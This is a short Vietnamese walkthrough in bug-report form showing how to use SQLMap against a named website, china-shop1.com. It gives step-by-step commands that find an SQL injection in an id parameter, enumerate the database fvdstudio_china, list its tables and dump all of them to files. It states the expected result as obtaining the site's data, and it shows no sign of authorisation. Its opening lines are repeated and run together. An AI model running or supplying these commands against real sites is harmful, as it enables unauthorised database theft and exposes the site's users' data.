a. Web Browser: Google Chrome: Phiên bản 95.0.4638.69 (Phiên bản Chính thức) (64 bit)
b. Các bước để phát hiện lỗi:
i. #1 Tải file cài đặt Python và SQLMap
Link cài đặt Python: https://www.python.org/downloads/ mở file vừa download chọn install for all users
Link cài đặt SQLMap: https://github.com/sqlmapproject/sqlmap/zipball/master ( giải nén file)
ii.#2 Mở app command prompt
iii, #3 Nhập cd và điều hướng file vừa giải nén vào
a. Web Browser: Google Chrome: Phiên bản 95.0.4638.69 (Phiên bản Chính thức) (64 bit) b. Các bước để phát hiện lỗi: i. #1 Tải file cài đặt Python và SQLMap Link cài đặt Python: https://www.python.org/downloads/ mở file vừa download chọn install for all users Link cài đặt SQLMap: https://github.com/sqlmapproject/sqlmap/zipball/master ( giải nén file)
ii.#2 Mở app command prompt
iii, #3 Nhập cd và điều hướng file vừa giải nén vào
iv, #4 Nhập câu lệnh python sqlmap.py -u "https://china-shop1.com/index.php?page=greatwall&id=1" Phát hiện có lỗi SQL Injection
v. #5 Nhập câu lệnh python sqlmap.py -u "https://china-shop1.com/index.php?page=greatwall&id=1" -dbs để tìm tên database của website
Ta phát hiện được tên database là fvdstudio_china
vi. #6 Nhập câu lệnh python sqlmap.py -u"https://china-shop1.com/index.php?page=greatwall&id=1" --tables -D fvdstudio_china để liệt kê các bảng trong database
Phát hiện các bảng dữ liệu có thể khai thác
vii. #7 Tiếp tục khai thác các bảng dữ liệu bằng câu lệnh python sqlmap.py -u"https://china-shop1.com/index.php?page=greatwall&id=1" --dump -D fvdstudio_china
Sau khi khai thác xong các bảng dữ liệu đã được lưu vào file
Thu được các file Excel chứa dữ liệu của Website
c. Kết quả thực tế: Các bảng dữ liệu của Website đã được lấy ra d. Kết quả mong đợi: Lấy được dữ liệu của Website